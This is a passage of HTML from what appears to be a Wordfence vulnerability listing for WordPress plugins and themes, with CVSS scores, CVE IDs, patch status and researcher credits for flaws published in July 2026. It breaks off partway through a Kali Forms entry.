<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63922c28-0cb5-4abe-85ee-20b2cc6f015d" target="_blank" rel="noopener">Demi &lt;= 0.0.6 &#8211; Unauthenticated Arbitrary Directory Deletion via demi_restore_step AJAX action</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14490" target="_blank" rel="noopener noreferrer">							CVE-2026-14490						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">Demi – One Click Demo Import, Backup &amp; Site Migration</a> <span class="wfvr-software-slug">[demi-backup-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63922c28-0cb5-4abe-85ee-20b2cc6f015d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/097a9d0f-fa38-4fdc-9048-43dd65e7652c" target="_blank" rel="noopener">FormGent &lt;= 1.9.2- Missing Authorization to Unauthenticated Arbitrary File Deletion via &#8216;file_token&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3141" target="_blank" rel="noopener noreferrer">							CVE-2026-3141						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formgent" target="_blank" rel="noopener">FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments &amp; More</a> <span class="wfvr-software-slug">[formgent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/097a9d0f-fa38-4fdc-9048-43dd65e7652c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9506f84-3d33-48e0-8dce-d517e1a923e4" target="_blank" rel="noopener">Meta Box AIO &lt;= 3.8.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Post Deletion via &#8216;rwmb_frontend_field_object_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.1 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14488" target="_blank" rel="noopener noreferrer">							CVE-2026-14488						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box-aio" target="_blank" rel="noopener">Meta Box AIO</a> <span class="wfvr-software-slug">[meta-box-aio]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9506f84-3d33-48e0-8dce-d517e1a923e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45816c45-42bc-4163-b700-a1e913f32c97" target="_blank" rel="noopener">AI Engine &lt;= 3.6.5 &#8211; Cross-Site Request Forgery to Privilege Escalation via REQUEST_URI Substring Match</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15988" target="_blank" rel="noopener noreferrer">							CVE-2026-15988						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5a50351dc3a5975487697a55ad3936d5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a50351dc3a5975487697a55ad3936d5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uko-2" target="_blank" rel="noopener">UKO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45816c45-42bc-4163-b700-a1e913f32c97" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/390a541e-68dd-43dd-8fe4-5334c534552c" target="_blank" rel="noopener">Betheme &lt;= 28.4.2 &#8211; Authenticated (Contributor+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65548" target="_blank" rel="noopener noreferrer">							CVE-2026-65548						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">Betheme</a> <span class="wfvr-software-slug">[betheme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/390a541e-68dd-43dd-8fe4-5334c534552c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23a73680-ed13-4250-95e8-2933403f54e6" target="_blank" rel="noopener">Eazy Plugin Manager &lt;= 4.4.1 &#8211; Authenticated (Subscriber+) Privilege Escalation via pos_get_option AJAX Action and admin/login REST Endpoint</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14328" target="_blank" rel="noopener noreferrer">							CVE-2026-14328						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugins-on-steroids" target="_blank" rel="noopener">Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress</a> <span class="wfvr-software-slug">[plugins-on-steroids]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f136390468287a6e9b71b79fe2a17e76.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f136390468287a6e9b71b79fe2a17e76"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nia" target="_blank" rel="noopener">Nia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/23a73680-ed13-4250-95e8-2933403f54e6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a929efaf-80a1-45c1-9426-6c5b45a66530" target="_blank" rel="noopener">Extra Checkout Options (addon for Extra Product Options &amp; Add-Ons for WooCommerce) &lt;= 2.3.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload in eco_save_settings</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14270" target="_blank" rel="noopener noreferrer">							CVE-2026-14270						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-tm-extra-checkout-options-addon" target="_blank" rel="noopener">Extra Checkout Options &#8211; addon for Extra Product Options plugin</a> <span class="wfvr-software-slug">[woocommerce-tm-extra-checkout-options-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a929efaf-80a1-45c1-9426-6c5b45a66530" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0867f6a6-17f6-48d3-8ef2-bf89f5b28b05" target="_blank" rel="noopener">FleekDash V2 &lt;= 2.6.2.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Administrator Account Takeover via /users/{id} REST Endpoint</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14356" target="_blank" rel="noopener noreferrer">							CVE-2026-14356						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fleekdash" target="_blank" rel="noopener">FleekDash V2</a> <span class="wfvr-software-slug">[fleekdash]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/05c109de991b49e44631bb886e85be4f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05c109de991b49e44631bb886e85be4f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener">maru</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0867f6a6-17f6-48d3-8ef2-bf89f5b28b05" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d42b8856-e5d0-4122-98a4-8c959832b271" target="_blank" rel="noopener">Pronamic Pay &lt;= 10.1.0 &#8211; Authenticated (Subscriber+) Privilege Escalation via Gravity Forms &#8216;Update user role&#8217; Field</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16635" target="_blank" rel="noopener noreferrer">							CVE-2026-16635						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pronamic-ideal" target="_blank" rel="noopener">Pronamic Pay</a> <span class="wfvr-software-slug">[pronamic-ideal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d42b8856-e5d0-4122-98a4-8c959832b271" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a64f840-8570-4f98-8b72-27bee1607fc2" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.3.0 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16236" target="_blank" rel="noopener noreferrer">							CVE-2026-16236						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/755c27bc10b9191ede88f572e832d542.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="755c27bc10b9191ede88f572e832d542"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/son-van-mrs0x06" target="_blank" rel="noopener">Son Van (mrs0x06)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a64f840-8570-4f98-8b72-27bee1607fc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/195f86a5-e3dc-4414-bbe3-dea312bf30a9" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.0 &#8211; Authenticated (Contributor+) Privilege Escalation via &#8216;_wps_plan_user_role&#8217; Membership Plan Meta</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15414" target="_blank" rel="noopener noreferrer">							CVE-2026-15414						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/195f86a5-e3dc-4414-bbe3-dea312bf30a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/327a155c-7a7d-494d-94d1-f7e7ee8927f0" target="_blank" rel="noopener">Wholesale for WooCommerce &lt;= 2.0.5 &#8211; Authenticated (Author+) Privilege Escalation via &#8216;user_role_set&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12144" target="_blank" rel="noopener noreferrer">							CVE-2026-12144						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-wholesale-pricing" target="_blank" rel="noopener">Wholesale for WooCommerce</a> <span class="wfvr-software-slug">[woo-wholesale-pricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/327a155c-7a7d-494d-94d1-f7e7ee8927f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ad5ca1c-b8c3-42c0-8170-821ada826cbb" target="_blank" rel="noopener">WP Password Policy &lt;= 3.7.1 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15992" target="_blank" rel="noopener noreferrer">							CVE-2026-15992						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-requirements" target="_blank" rel="noopener">WP Password Policy</a> <span class="wfvr-software-slug">[password-requirements]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4ad5ca1c-b8c3-42c0-8170-821ada826cbb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d692aff-8bb2-45bb-9caf-bc33d3ed5b10" target="_blank" rel="noopener">Kali Forms &lt;= 2.4.20 &#8211; Unauthenticated Remote Code Execution via &#8216;thisPermalink&#8217; Field Parameter</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
